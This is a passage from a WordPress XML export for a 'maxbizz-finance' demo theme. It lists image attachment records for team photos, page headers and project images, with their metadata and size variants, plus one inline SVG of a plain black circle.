;s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team8</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-team/team8/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team8.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>697</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team8]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team8.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team8.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team8.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team8-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team8-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team8-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team8-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team8-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-team/image1-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:53:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>699</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:53:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:53:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:959;s:6:"height";i:650;s:4:"file";s:25:"2020/09/image1-team.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:25:"image1-team-1-300x203.jpg";s:5:"width";i:300;s:6:"height";i:203;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"image1-team-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"image1-team-1-768x521.jpg";s:5:"width";i:768;s:6:"height";i:521;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"image1-team-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"image1-team-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"image1-team-1-959x600.jpg";s:5:"width";i:959;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-single-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-team/single-team/image1-single-team/</link>
		<pubDate>Thu, 10 Sep 2020 03:28:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>713</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 03:28:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 03:28:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-single-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>711</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-single-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:530;s:6:"height";i:500;s:4:"file";s:32:"2020/09/image1-single-team.jpg";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:32:"image1-single-team-1-300x283.jpg";s:5:"width";i:300;s:6:"height";i:283;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"image1-single-team-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"image1-single-team-1-530x400.jpg";s:5:"width";i:530;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-blog</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/blog/pheader-blog/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-blog.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>770</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-blog]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>768</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-blog.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-blog.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:26:"2020/09/pheader-blog.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"pheader-blog-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"pheader-blog-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"pheader-blog-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"pheader-blog-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:27:"pheader-blog-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-blog-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-blog-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"pheader-blog-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"pheader-blog-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-project</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/pheader-project/</link>
		<pubDate>Thu, 10 Sep 2020 10:20:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-project.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>774</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 10:20:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 10:20:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-project]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-project.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-project.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:29:"2020/09/pheader-project.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:28:"pheader-project-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"pheader-project-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"pheader-project-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"pheader-project-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:30:"pheader-project-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"pheader-project-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"pheader-project-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:30:"pheader-project-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:30:"pheader-project-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/project-slide-1/</link>
		<pubDate>Thu, 10 Sep 2020 10:41:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>778</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 10:41:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 10:41:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:29:"2020/09/project-slide-1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"project-slide-1-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-slide-1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-slide-1-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-1-1-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-details</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/project-details/</link>
		<pubDate>Fri, 11 Sep 2020 03:07:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-details.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>780</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 03:07:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 03:07:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-details]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-details.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-details.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1174;s:6:"height";i:620;s:4:"file";s:29:"2020/09/project-details.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:29:"project-details-1-300x158.jpg";s:5:"width";i:300;s:6:"height";i:158;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"project-details-1-1024x541.jpg";s:5:"width";i:1024;s:6:"height";i:541;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-details-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-details-1-768x406.jpg";s:5:"width";i:768;s:6:"height";i:406;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-details-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-details-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:30:"project-details-1-1174x600.jpg";s:5:"width";i:1174;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>black-circle</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/black-circle/</link>
		<pubDate>Fri, 11 Sep 2020 03:20:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/black-circle.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>782</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 03:20:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 03:20:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[black-circle]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/black-circle.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/black-circle.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-10</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/retirement-plan/project-10/</link>
		<pubDate>Fri, 11 Sep 2020 04:32:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-10.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>800</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:32:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:32:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-10]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>797</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-10.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-10.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:695;s:4:"file";s:24:"2020/09/project-10.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"project-10-1-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"project-10-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"project-10-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"project-10-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"project-10-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-12</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-planning/project-12/</link>
		<pubDate>Fri, 11 Sep 2020 04:38:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-12.jpg</guid>
		<description></description>
